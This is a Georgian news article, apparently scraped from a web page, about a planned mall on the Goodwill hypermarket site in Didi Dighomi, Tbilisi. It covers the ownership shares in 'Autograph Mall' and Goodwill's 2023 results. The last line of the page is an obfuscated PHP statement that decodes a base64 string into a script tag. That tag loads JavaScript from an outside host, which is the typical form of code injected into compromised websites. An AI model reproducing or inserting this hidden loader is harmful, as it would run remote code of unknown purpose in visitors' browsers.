gorgia
გარე ავეჯი

თბილისში, დიდ დიღომში "გუდვილის" ჰიპერმარკეტის 43,100 კვადრატული მეტრის მიწის ნაკვეთზე ახალი მულტიფუნქციური მოლი აშენდება. პროექტს კომპანია "ავტოგრაფ მოლი" ახორციელებს, რომლის საკუთრებაშიც ჰიპერმარკეტის უძრავი ქონება უკვე რეგისტრირებულია.

ახალი სავაჭრო ცენტრის ფართობი დაახლოებით 60,000 კვადრატული მეტრი იქნება. ბიზნეს რეესტრის თანახმად, "ავტოგრაფ მოლი" 2023 წლის თებერვალში დაფუძნებული კომპანიაა, ამ კომპანიას თავის მხრივ ფლობს სამი კომპანიისგან შემდგარი კონსორციუმი.

უფრო დეტალურად, "ავტოგრაფ მოლის" 50%-იან წილსაც ფლობს კომპანია "აპკო დეველოპმენტი", რომელსაც სრულად ფლობს კომპანია "ფინვესტ საქართველო".

25%-იან წილს ფლობს კომპანია "ბლოქსი დიდი დიღომი", რომელსაც თავის მხრივ ფლობს კომპანია "ბლოქსი".

25%-იანი წილის მფლობელია კომპანია შპს "სამშენებლო ინვესტიციები დიღომში", რომელსაც თავის მხრივ ფლობს კომპანია "ავტოგრაფი გუდვილი".

რაც შეეხება თავად "გუდვილს", კომპანიას 2024 წლის ფინანსური შედეგები ჯერჯერობით გასაჯაროებული არ აქვს, 2023 წლის მდგომარეობით კი სუპერმარკეტებისა და ჰიპერმარკეტების ქსელის შემოსავალმა 185.6 მილიონი ლარი შეადგინა. აღნიშნულ პერიოდში კომპანიის მოგება 4.3 მილიონი ლარი იყო.

ფინანსური ანგარიშის თანახმად, "გუდვილის" მფლობელია ბიზნესმენი ირინა ქოსაშვილი.

 

2346
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");